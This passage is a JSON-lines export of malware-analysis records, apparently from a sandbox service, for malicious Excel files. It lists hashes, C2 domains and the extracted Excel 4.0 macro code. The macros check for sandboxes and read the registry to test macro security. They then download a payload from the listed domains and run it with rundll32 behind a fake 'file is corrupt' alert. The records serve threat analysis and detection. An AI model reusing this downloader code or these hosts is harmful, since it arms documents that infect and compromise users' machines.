c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7gDggYGXdg\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4abafd3460c052ba198aa10f66182c7727d07994370d4b604cdcd03ccded22fb"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4abafd3460c052ba198aa10f66182c7727d07994370d4b604cdcd03ccded22fb","filesize":152576,"md5":"a152a6828dfd62d4ffbe0bcfd7e74d18","sha1":"a67942b67b2a0b6b1b1bcbf8fbbbba892e5fe01d","sha256":"4abafd3460c052ba198aa10f66182c7727d07994370d4b604cdcd03ccded22fb","sha512":"ae7deb3dd4e62b29e62c7ab5d7deb830f43a8bf7d5d9d6f2fd0d19eb8ef8524d37b43109876c5aa6d42655cde1b23d5a60f0487cdc5802d0553ea25eece28a2e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4abafd3460c052ba198aa10f66182c7727d07994370d4b604cdcd03ccded22fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"d2okUCEg9B\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4abcbddcd90008539f3db22787d65b48ceaf5ab042e37a86a1a8d9cbb9681692"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4abcbddcd90008539f3db22787d65b48ceaf5ab042e37a86a1a8d9cbb9681692","filesize":168960,"md5":"f45f8a87df20d765748f11485a5ebb7b","sha1":"da357aa00d89c1689fb1ab9879a069b80b612dfa","sha256":"4abcbddcd90008539f3db22787d65b48ceaf5ab042e37a86a1a8d9cbb9681692","sha512":"18a86ceefed7167a8f1e34dd08baddfe6d5cd09a2540b2cb6ec356a5b602ab3569f3ece6cecd66928ac164cc8663268dfc3334025e6aa68e8a8877f01d036f29","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4abcbddcd90008539f3db22787d65b48ceaf5ab042e37a86a1a8d9cbb9681692.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KYs0jng8mn\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4abd6389d2455a7d924d8b8a127aa4a4e9b62c3827f4c835a85f741955a22d39"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4abd6389d2455a7d924d8b8a127aa4a4e9b62c3827f4c835a85f741955a22d39","filesize":109568,"md5":"b3ec8766795c2689dee8624d06e8dd50","sha1":"6b276f396b500fe36ed097efc0cc11c751358a7b","sha256":"4abd6389d2455a7d924d8b8a127aa4a4e9b62c3827f4c835a85f741955a22d39","sha512":"67739b1ab1ed0fcfad6e0668af3ccf8a699a29c537c0e58e84b448431c8389b05b05185b91701aaf4cc5c4264219aefc762593fb8c48c7d509bf9a31b01635fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4abd6389d2455a7d924d8b8a127aa4a4e9b62c3827f4c835a85f741955a22d39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"Zt7nutXIxc\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ac784a7bd96e8460f2eaf86ffba580ca9dc45c6cf78944b6883861837b3cdb0"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4ac784a7bd96e8460f2eaf86ffba580ca9dc45c6cf78944b6883861837b3cdb0","filesize":206336,"md5":"cba9956419577cd8a856be8953e4a96f","sha1":"5913e8ebf3b4ef85b8d5bc8e041f9c68fc9b731a","sha256":"4ac784a7bd96e8460f2eaf86ffba580ca9dc45c6cf78944b6883861837b3cdb0","sha512":"2e03d254b756a232dae662e0aba6567fe2a6236311242e7c477b176d3b9c899e490910f8682c53b36996c35b7d7c07ae7537aae31c2717d156aa95d1afd46ecd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ac784a7bd96e8460f2eaf86ffba580ca9dc45c6cf78944b6883861837b3cdb0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dYyJQGEWLL\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ad1039c4ec30f06e39deb26ce29c6c5d61fabe6eb18d29260cf5df566a291dd"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4ad1039c4ec30f06e39deb26ce29c6c5d61fabe6eb18d29260cf5df566a291dd","filesize":142848,"md5":"1742f5ccacf53289b76956f5465cb924","sha1":"3282186e0392af7561e676083f6f0053a34b24a1","sha256":"4ad1039c4ec30f06e39deb26ce29c6c5d61fabe6eb18d29260cf5df566a291dd","sha512":"f6364cfd8b1b6bbf8b5e530a045db144f840abf1c158a9ca89c12cefd2874426920237061eda093bb74804fecf51b7849a91f5dc1984e876c28b02de44bc182d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ad1039c4ec30f06e39deb26ce29c6c5d61fabe6eb18d29260cf5df566a291dd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"KB3Ivu5x2J\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4ae8c133728ec31f801b70b171bf84ae13c41896e8025dafce360f8e160f81e2"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4ae8c133728ec31f801b70b171bf84ae13c41896e8025dafce360f8e160f81e2","filesize":152576,"md5":"377f94b22064cb71e5892aacc52882bd","sha1":"a7428dbdbb4f5ab4df7ca0a09ab803225c92cbac","sha256":"4ae8c133728ec31f801b70b171bf84ae13c41896e8025dafce360f8e160f81e2","sha512":"0df282564def250d2474ccba324325dc3deaed7a5511bff5413a97532b8c4b0d9827d93bbda057af1673a2c31c4c84bfd48bb040de93ca18bdd105c13630360d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4ae8c133728ec31f801b70b171bf84ae13c41896e8025dafce360f8e160f81e2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qwYfrUJqOX\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4afe2f900cd3ca3d91cee0b045695df3cdea340bae43cd605adb8c81c698360b"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4afe2f900cd3ca3d91cee0b045695df3cdea340bae43cd605adb8c81c698360b","filesize":160768,"md5":"b4b3a4c3e5792ad0025dc81dfea719eb","sha1":"dc0ee476c600919e47457fa8c98b152f2c7f3484","sha256":"4afe2f900cd3ca3d91cee0b045695df3cdea340bae43cd605adb8c81c698360b","sha512":"c77737636afaf209ee088e20747c66bf074353607d144f9861f19f5e4676269477446f0c5b498581f038e244107945806d50f8cc22e25d3d0115736cff8f0970","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4afe2f900cd3ca3d91cee0b045695df3cdea340bae43cd605adb8c81c698360b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QVX9QkFuVx\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b03cb4fd47e11f347a877d4c02813f474208cbd8c81eaf38938e13844a0c181"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4b03cb4fd47e11f347a877d4c02813f474208cbd8c81eaf38938e13844a0c181","filesize":206336,"md5":"1674aeb52d0ab53fdc8052a890b8b4cc","sha1":"a383e568c34aae4f6263d595ceb7b48a930f28e7","sha256":"4b03cb4fd47e11f347a877d4c02813f474208cbd8c81eaf38938e13844a0c181","sha512":"e2a589eafce33bf20b3ce08eca751e7294c51110c51ade4dc4f924217237ce258107ab9bfd06fba601535f683f5a8452df04438bfd54787aa984a932f02ec1d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b03cb4fd47e11f347a877d4c02813f474208cbd8c81eaf38938e13844a0c181.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cLb8uh5AQT\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b16de367a844b8fd5fe31a33c6abf51f8714372d2f6c53c61aff40f2014ae0d"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4b16de367a844b8fd5fe31a33c6abf51f8714372d2f6c53c61aff40f2014ae0d","filesize":141824,"md5":"caabba676915c681a6684047f1b7f124","sha1":"e4037c3d5df580f94c03e38305bec2125c1210a5","sha256":"4b16de367a844b8fd5fe31a33c6abf51f8714372d2f6c53c61aff40f2014ae0d","sha512":"ca37a111a8c7c186ce07c21216ff7a5ea9519c26b22ec55385118cdad90ca2244dd2bfee61acc6ce09b65f065d6501dea2a392fa4d64dc1d9127df2224457880","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b16de367a844b8fd5fe31a33c6abf51f8714372d2f6c53c61aff40f2014ae0d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"yEsXnREi6P\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b1f965ddb64ade37d6d5c5a7ae2a3305587043d0d3cef547821bbb4a9021d85"},"analysis":{"reported":"2020-04-09T16:16:10Z","score":10},"files":[{"filename":"4b1f965ddb64ade37d6d5c5a7ae2a3305587043d0d3cef547821bbb4a9021d85","filesize":167936,"md5":"10a4cd3a63315adfaa839fedd7fe4fea","sha1":"a90c02d58d1c3dc5d48c62cadfd748a2dad2b63a","sha256":"4b1f965ddb64ade37d6d5c5a7ae2a3305587043d0d3cef547821bbb4a9021d85","sha512":"0dcb5c94b714a0e03314ee4446620072bebc63c073717b7c5231421b5f5024330bf13a589c1b9e4703d449aad46f59ecae9534a8a7985ebecfb23809d3e8594f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b1f965ddb64ade37d6d5c5a7ae2a3305587043d0d3cef547821bbb4a9021d85.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gUJaAmuMBV\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b2f7c248798d477bca9384269c07171d9b3ec4f8693f38b7517a9457e10756b"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b2f7c248798d477bca9384269c07171d9b3ec4f8693f38b7517a9457e10756b","filesize":206336,"md5":"8425bc7221239b7142d8d07f1d2765b5","sha1":"20d52a2a31c10d71e68421b07f14b2980ab92984","sha256":"4b2f7c248798d477bca9384269c07171d9b3ec4f8693f38b7517a9457e10756b","sha512":"2305afbc8e574c9d8e7ca3aeea19bd7bff40dbc67a4cce041e1a15c0f1b14209dfa22d75f36757221812c549fa49ef3baef90c0441a4bf7bb3b9be1a4544cc13","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b2f7c248798d477bca9384269c07171d9b3ec4f8693f38b7517a9457e10756b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wWb43Ezr1v\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b38a7ca2fcb0cd1a8df15160b5df62a5a2687f6ba143bc41e7f9b122b0c8ca4"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b38a7ca2fcb0cd1a8df15160b5df62a5a2687f6ba143bc41e7f9b122b0c8ca4","filesize":167936,"md5":"09a6874fc7e5f0270fe5212a547e25d8","sha1":"36fa2737e5602ea32120f33910b6e22c110c1a66","sha256":"4b38a7ca2fcb0cd1a8df15160b5df62a5a2687f6ba143bc41e7f9b122b0c8ca4","sha512":"6005f53c14ac2928e8782470c3150a86915ce081878c544f5ee884064ba3fed72f1f593f05a1045a0142f9c041884c841ecef3021ca14b4d50926af55c51c223","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b38a7ca2fcb0cd1a8df15160b5df62a5a2687f6ba143bc41e7f9b122b0c8ca4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8YPpYJvHZi\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b3cdefd1f07295ad51053e9b50aa340756b5c4b77003a9cf3ca445c3016e0e7"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b3cdefd1f07295ad51053e9b50aa340756b5c4b77003a9cf3ca445c3016e0e7","filesize":185344,"md5":"f585b9c5aff296209467d88a73628919","sha1":"f11c1290d4cc582ceacf34e60a4686f9382114bd","sha256":"4b3cdefd1f07295ad51053e9b50aa340756b5c4b77003a9cf3ca445c3016e0e7","sha512":"849bf63e0e22d91ac77d39592af71dbc3ce36eec17dad32ced91ba571517dae8dc0227a4f43623ae6a11c01763d22f144501f68bcf861cd62dcef2cea84374a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b3cdefd1f07295ad51053e9b50aa340756b5c4b77003a9cf3ca445c3016e0e7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b65e0d3155b7c668a96a68782fca8d0e5da997b00af2bd6e7a4078a2c2a978a"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b65e0d3155b7c668a96a68782fca8d0e5da997b00af2bd6e7a4078a2c2a978a","filesize":167936,"md5":"ccbb17aacd157ac69fa3538f35837546","sha1":"dcd5430f056f308d4d17ded0a073a59cd5941715","sha256":"4b65e0d3155b7c668a96a68782fca8d0e5da997b00af2bd6e7a4078a2c2a978a","sha512":"e6a3807b2996057fb5fbdbf8befa42ab75197379ac144771543cfcb1e01572194fc434684da620d8cce4f86e06d41f2efbca3f4eddb95225447c00c47cc54941","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b65e0d3155b7c668a96a68782fca8d0e5da997b00af2bd6e7a4078a2c2a978a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"csdU7c5Jf1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4b6763c1dec342655dd0d1beb333e2e87026e59e73b6418042d928dd3c62d4da"},"analysis":{"reported":"2020-04-09T16:16:11Z","score":10},"files":[{"filename":"4b6763c1dec342655dd0d1beb333e2e87026e59e73b6418042d928dd3c62d4da","filesize":177152,"md5":"bb11bd8b1c7025a1425d3ad42cb5747d","sha1":"144e3bfe1b7a72ee82d21dfcbf504089366236e9","sha256":"4b6763c1dec342655dd0d1beb333e2e87026e59e73b6418042d928dd3c62d4da","sha512":"e04b6e262fee810d3760151bd918c18aa094fc39a6a44b3aa15ffd956482bbad7f047599774555f490e3236a30ca71a35e732a5e7c0007464e902638c97d947e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4b6763c1dec342655dd0d1beb333e2e87026e59e73b6418042d928dd3c62d4da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 